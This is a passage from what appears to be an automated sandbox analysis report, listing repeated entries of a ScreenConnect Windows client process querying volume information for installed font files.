                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
